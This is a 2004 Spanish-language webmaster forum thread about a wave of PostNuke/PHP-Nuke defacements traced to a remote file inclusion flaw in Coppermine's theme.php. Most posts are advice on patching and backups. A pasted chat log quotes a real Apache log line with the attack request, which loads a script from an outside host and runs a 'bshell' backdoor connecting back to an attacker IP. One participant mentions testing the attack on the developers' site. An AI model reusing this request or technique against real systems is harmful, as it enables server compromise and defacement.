|
|
|
|
|
|
|
|
razorman
|
|
|
Enviado: 21/05/2004 a las 15:05 |
|
Colaborador
Karma: 6 (17 Votos)
Registrado: 03/12/03
Mensajes: 392
Estado: Desconectado
Ultima visita: 05/07/07 |
Pues si. No queda otro remedio que estar actualizado. Venga suerte a todos
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 21/05/2004 a las 15:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
Hola vamos a actualizarlas por las dudas voy a armar una pequeña descarga con los archivos que tenes que a actualizar as ique vamos uqe toma 5 minutos y nos evita interminables horas de dolores y dolores de cabeza
|
|
|
|
|
|
|
mauricio
|
|
|
Enviado: 21/05/2004 a las 15:05 |
|
Habitual
Karma: 10 (2 Votos)
Registrado: 25/11/03
Mensajes: 88
Estado: Desconectado
Ultima visita: 01/02/06 |
Hola, que les aconsejarian a todos los que administramos sitios postnuke, a parte de realizar todas las actualizaciones que estan ya publicadas.....?
Desde ya gracias por todo!!!
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 21/05/2004 a las 15:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
Mira ademas de tner actualizados todos los parches, es siempre tener un backup de los archivos, esto siempre tratando de mantenerlo lo mas actualizado posible.
Y hacer un backup de la base de datos al menos dos o 3 veces por semana, dependiendo del trafico en la web de ustedes
Saludos
PD: Haciendo esto pues por mas hackeos y demas, ustedes n pierden nada de informacion o en su defecto muy poca
|
|
|
|
|
|
|
|
|
|
Invitado
|
|
|
Enviado: 21/05/2004 a las 16:05 |
|
|
Usuario no registrado
|
Yo les recomiendo a todos aquellos que sean religiosos que recen por esta web a su Dios y/o dioses, ya sean paganos, romanos, egipcios... lo que sea :P
Salu2 de Waisen.
PD: no os alarmeis, hay miles de hackers por internet, si no es uno sera otro... vosotros haced backup's una vez a la semana o cada dos dias y listo... si han entrado en el pentagono ¿como no van a tirar una pagina?
|
|
|
|
|
|
|
Skyrider
|
|
|
Enviado: 21/05/2004 a las 17:05 |
|
Novato
Karma: 0 (0 Votos)
Registrado: 04/08/03
Mensajes: 11
Estado: Desconectado
Ultima visita: 03/07/06 |
Bueno pues antes que nada decirles que aparte de tener actualizada la Web y hacer backups os recomiendo como webmaster de dos de las webs hackeadas no usar las password en las bases de datos las mimas del acceso a vuestro panel del hosting, aunque en postnuke hispano no se produjo desde nuestro postnuke si no desde un archivo diferente de otro usuario ya que miramos los logs de acceso y vimos de donde procedia, de ahi el hackeo y susodicho cambio de index en la makina, no hacen mas que eso, no tocan ni la base de datos ni nada de nada, y bueno actualizen sus postnuke, nosotros ya tenemos preparados en los dos portales el 0.7.5.0 del CVS de postnuke.com listo para subir, les deseo suerte
|
|
|
|
|
|
|
gusmori
|
|
|
Enviado: 21/05/2004 a las 18:05 |
|
Frecuente
Karma: 0 (0 Votos)
Registrado: 05/11/03
Mensajes: 26
Estado: Desconectado
Ultima visita: 04/07/05 |
Supongo que postnuke-espanol, postnuke-hispano y aferve tendrían todos los parches que han salido hasta ahora.
Debe de ser algún bug nuevo.
http://www.recurso.tk
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 21/05/2004 a las 18:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
Este es la explicacion de lo que paso....
es asi
el theme.php del phpnuke
llama a un script en una pagina.. ese script es un archivo.gif
que tiene adentro el backdoor que se guarda en el server
y despues se ejecuta ese backdoor y va rompiendo los index de los directorios que encuentra en el apache
Mas adelante cuando tenga mas datos voy a ir postandolos...
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 21/05/2004 a las 20:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
nuevo dato
el drama es el siguiente
ese backdoor llamado bshell.sh aprovecha una vulnerabilidad del kernel 2.4.24
que aparentemente ese exploit era para usuarios locales
y el tener el php en 'no safe_mode' en el server
hace que permita ejecutar archivos
http://linux.mty.itesm.mx/pipermail/ayuda/2004-January/000077.html
Bueno esto y la anterior explicacion me la dio Fernando Figuretti Honig, asi uqe gracias a el
|
|
|
|
|
|
|
noldan
|
|
|
Enviado: 21/05/2004 a las 21:05 |
|
Novato
Karma: 0 (0 Votos)
Registrado: 13/08/03
Mensajes: 6
Estado: Desconectado
Ultima visita: 01/05/06 |
¿con eso que quieres decir que el server tambien puede dejar de funcionar? ¿y por eso no funcionan algunos hostings?
Siempre ayudándonos...
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 21/05/2004 a las 21:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
exactamente eso que el bug era del kernel de los servidores en linux y no funcionan en realidad los servidores que deben estar siendo parcheados, imagino a esta altura, la buena noticia es que por lo menos por lo visto no hay perdidas de informacion, pero eso dependera de cada provvedor de hosting
Y el bug si bien afecta a los sitios en phpnuke, postnuke y demas no es necesariamente un bug de estos sistemas
|
|
|
|
|
|
|
noldan
|
|
|
Enviado: 21/05/2004 a las 21:05 |
|
Novato
Karma: 0 (0 Votos)
Registrado: 13/08/03
Mensajes: 6
Estado: Desconectado
Ultima visita: 01/05/06 |
Gracias hache. Es que yo tengo dos web: una con postnuke 0.726 y otra con xoops 2.0.6 . Las dos en el mismo hosting y la de postnuke fue hackeada y la de xoops no. Pero hoy por la tarde la que tengo con xoops ya no funciona (da error 404).
Siempre ayudándonos...
|
|
|
|
|
|
|
hache
|
|
|
Enviado: 22/05/2004 a las 23:05 |
|
Posteador de Oro
Karma: 9 (11 Votos)
Registrado: 06/09/03
Mensajes: 1328
Estado: Desconectado
Ultima visita: 11/03/07 |
Hola creo que esto que voy a decir va a impactar en usedes como lo hizo en mi
El modulo que genero tantos problemas en lso servidores es nada mas ni nada menos que el coppermine voy a copiar algunos fragementos de una conversacion que tuve donde hablo con un amigo que tiene una web en phpnuke, y donde el bruj0 que sale emncioando en la conversacion no mas ni menos que un administrador de servers que es un guru en linux y en php....
Bueno sin mas pongo la charla, espero que entiendan que por ahi insulto un poco pero creo que es la bronca de todo esto que paso
Comandante Hache:: dev-postnuke.com dice:
hola
Comandante Hache:: dev-postnuke.com dice:
matias
PlanetMan dice:
hola hache
PlanetMan dice:
todo bien?
Comandante Hache:: dev-postnuke.com dice:
si
Comandante Hache:: dev-postnuke.com dice:
te queria hacer una pregunta sobre lo de coppermine
Comandante Hache:: dev-postnuke.com dice:
que me expliques bien
PlanetMan dice:
pasa que este modulo es para mostrar una galeria de fotos
Comandante Hache:: dev-postnuke.com dice:
lo conozco
PlanetMan dice:
esta compuesto por varios archivos php que se llaman entre si
PlanetMan dice:
como paramentro para el archivo themes,php viene una direccion del directorio donde esta la imagen y el nombre de la imagen
PlanetMan dice:
y con esos parametros se hace un require (como un include)
Comandante Hache:: dev-postnuke.com dice:
sip
PlanetMan dice:
lo que significa que el parametro que vos pasabas por la url directamente se ejecutaba en el server
PlanetMan dice:
sin ninguna comprobacion
PlanetMan dice:
y como parametro pasaban un archivo .gif de extension pero que en realidad era un script en php que utilizaba una vulnerabilidad del apache o del kernel no se
Comandante Hache:: dev-postnuke.com dice:
y esa imagen en realidad era ese sh que explotaba esa vulnerabilidad
Comandante Hache:: dev-postnuke.com dice:
claro
PlanetMan dice:
sip
Comandante Hache:: dev-postnuke.com dice:
ahora el modulo ese es para phpnuke o postnuke??
Comandante Hache:: dev-postnuke.com dice:
o sea para postnuke esta
Comandante Hache:: dev-postnuke.com dice:
no se para phpnuke
PlanetMan dice:
y accedian a todos los dominios hospedados y rompian todos los index.html
Comandante Hache:: dev-postnuke.com dice:
sip
PlanetMan dice:
es para phpnuke pero creo que debe estar disponibles para los dos
Comandante Hache:: dev-postnuke.com dice:
para postnuke existe
PlanetMan dice:
hoy me fije y ya tienen un parche de seguridad pero fue publicado hoy
Comandante Hache:: dev-postnuke.com dice:
claro pero son unos boludos
PlanetMan dice:
debe haber habido una epidemia ayer de este bugs.
Comandante Hache:: dev-postnuke.com dice:
sip
Comandante Hache:: dev-postnuke.com dice:
hace unosdias
Comandante Hache:: dev-postnuke.com dice:
ya
PlanetMan dice:
muy mal hecho el php de coppermine
Comandante Hache:: dev-postnuke.com dice:
que forros que son
PlanetMan dice:
te paso el archivo para que veas el bolazo que hicieron
Comandante Hache:: dev-postnuke.com dice:
dale
Comandante Hache:: dev-postnuke.com dice:
el parche o el corrompido?
PlanetMan envía:
Abrir (Alt+o)
PlanetMan dice:
no este es el archivo original en la cabecera dice la pagina de los desarrolladores
Ha recibido satisfactoriamente C:\Documents and Settings\fran\Mis documentos\Mis archivos recibidos\theme.php de PlanetMan.
PlanetMan dice:
el logs que me envio el brujo es
PlanetMan dice:
200.177.162.14 - - [21/May/2004:07:59:53 -0300]
"GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http
://www.itxm.org/newcmd.gif?&cmd=cd%20/tmp;%20chmod%207777%20bshell;%
20./bshell%20200.177.162.14%201524 HTTP/1.1"
200 11676 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Comandante Hache:: dev-postnuke.com dice:
que increibles
Comandante Hache:: dev-postnuke.com dice:
que son
Comandante Hache:: dev-postnuke.com dice:
habran sido los desarrolladores del modulo??
PlanetMan dice:
no tengo idea
PlanetMan dice:
hoy para probar si tenian su sitio protegido lo probe contra ellos pero parece que fui el primero y ya estaban protegidos
Comandante Hache:: dev-postnuke.com dice:
o no tenian mas el script dentro de su sitio
Comandante Hache:: dev-postnuke.com dice:
como lo arreglaron???
PlanetMan dice:
yo para colmo ni lo uso a este modulo
PlanetMan dice:
estaba al pedo porque vino con el nuke
PlanetMan dice:
ya lo borre
Comandante Hache:: dev-postnuke.com dice:
el parche
Comandante Hache:: dev-postnuke.com dice:
que hicieron scaron esa linea o que??
PlanetMan dice:
fijate la url http://www.itxm.org/newcmd.gif que es el script que ejecutaron
PlanetMan dice:
esta muy bueno
PlanetMan dice:
en http://www.truzone.org hay un parche pero es para la version que ellos hacen de phpnuke, entra por donde dice version Nuke ET 7.1 o 2 no me acuerdo y ahi esta
Comandante Hache:: dev-postnuke.com dice:
aja pero no lo bajaste??
PlanetMan dice:
si pero no lo guarde porque ya habia borrado el modulo
PlanetMan dice:
porque no me hacia falta
Comandante Hache:: dev-postnuke.com dice:
pero viste si habian borrado la linea o que habian hecho??
PlanetMan dice:
hacian ciertas comprobaciones del contenido de los parametros que viene de la url
PlanetMan dice:
fijate en http://www.truzone.org/modules.php?name=Projet&op=affichageprojet&idpr=13 ahi esta primero de todo el parche
|
|
|
|
|
|
|
Navegación
Oleada de Hackeos
